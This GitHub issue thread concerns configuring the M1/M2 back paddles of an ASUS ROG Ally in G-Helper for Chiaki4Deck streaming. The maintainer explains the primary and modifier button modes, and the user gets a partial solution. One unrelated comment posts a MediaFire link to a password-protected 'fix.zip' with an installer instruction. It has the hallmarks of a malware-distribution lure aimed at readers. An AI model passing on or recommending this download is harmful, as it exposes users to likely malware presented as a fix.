### ISSUE TITLE
ROG Ally - How Do I Configure the Paddles for My Specific Needs?

### ISSUE THREAD

**Issue by mufaaf** [seerge/g-helper#3020]
### Rules

- [X] I made myself familiar with the <a href='https://github.com/seerge/g-helper?tab=readme-ov-file'>Readme</a>, <a href='https://github.com/seerge/g-helper/wiki/FAQ'>FAQ</a> and <a href='https://github.com/seerge/g-helper/wiki/Troubleshooting'>Troubleshooting</a>.
- [X] I understand that, if insufficient information will be provided, my issue will be closed without an answer.

### Is your feature request related to a problem? Please describe

Hey folks. I want to use ROG Ally for PS Streaming using Chiaki4Deck.

The ROG Ally has two back paddles, M1 and M2, which I would like to use for gameplay (Left Stick click (M1) and Touchpad (M2)), which I can configure it to be so, but I would also like to use the M2 for PS Button, as well as retain the M1 for the shortcuts that is built-in with GHelper.

I see that M1 and M2 have primary and secondary functions, but I haven't been able to figure out how to use them properly. Could someone here help me how to configure it to the way I want, or if it is at all possible in any other way? Thanks!

### Describe the solution you'd like

No clue, lol!

### Device and Model

Asus ROG Ally Z1E

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seerge** [comment]
@mufaaf hello, I don't know think you can bind PS button specifically. But you can make M1 or M2 emit XBox button instead (just set it to be a primary function in controller settings) and check if this is enough for Chiaki4Deck .

**Comment by mufaaf** [comment]
> @mufaaf hello, I don't know think you can bind PS button specifically. But you can make M1 or M2 emit XBox button instead (just set it to be a primary function in controller settings) and check if this is enough for Chiaki4Deck .

Oh, no. I can set either of the buttons to the PS Buttons, that's no problem. Chiaki4Dec has PS Button bind to the Esc key, which I have set to the M2 button and it works fine.

What I wanted was the following:

M1 button: works as 'T' on the keyboard (to emulate touchpad), but _also_ as the button to execute GHelper shortcuts.
M2 button: works as 'Left Stick Click' on the joystick, but also works as the 'Esc' key to emulate the PS Button.

I am not sure how to set that up properly, or even if its possible. I see the Primary and Secondary fields but I don't know how to set it up properly.

**Comment by seerge** [comment]
@mufaaf I'm not sure if I'm getting you here.

Each of macro buttons (M1/M2) can act either as :
- "primary" when it emits specific button / action by itself, but any combos like `M1 + A` won't work
- "modifier" when by itself it doesn't emit anything, but works as a modifier with any other controller button. And combos like `M1 + A` emit "secondary" function for `A` button

This is how Ally controller is programmed on hardware / firmware level and both AC or G-Helper can customize only this options

**Comment by mufaaf** [comment]
> @mufaaf I'm not sure if I'm getting you here.
> 
> Each of macro buttons (M1/M2) can act either as :
> 
> * "primary" when it emits specific button / action by itself, but any combos like `M1 + A` won't work
> * "modifier" when by itself it doesn't emit anything, but works as a modifier with any other controller button. And combos like `M1 + A` emit "secondary" function for `A` button
> 
> This is how Ally controller is programmed on hardware / firmware level and both AC or G-Helper can customize only this options

Hmm, I understand now...somewhat. Basically, either of the M buttons has to be a "secondary enabler" and only then will the other secondary functions work.

I just mapped M2 to Left Stick Click and Esc using M1 as the enabler, and it worked. That solves part of the problem. I can make do with that. Thanks!

**Comment by seerge** [comment]
@mufaaf np, I personally use both M1/M2 as modifiers ("enabler" in your terms), and bind M + (something) to custom actions.

By default G-Helper already offers few useful M+ bindings including brightness controls listed here https://github.com/seerge/g-helper?tab=readme-ov-file#rog-ally-bindings
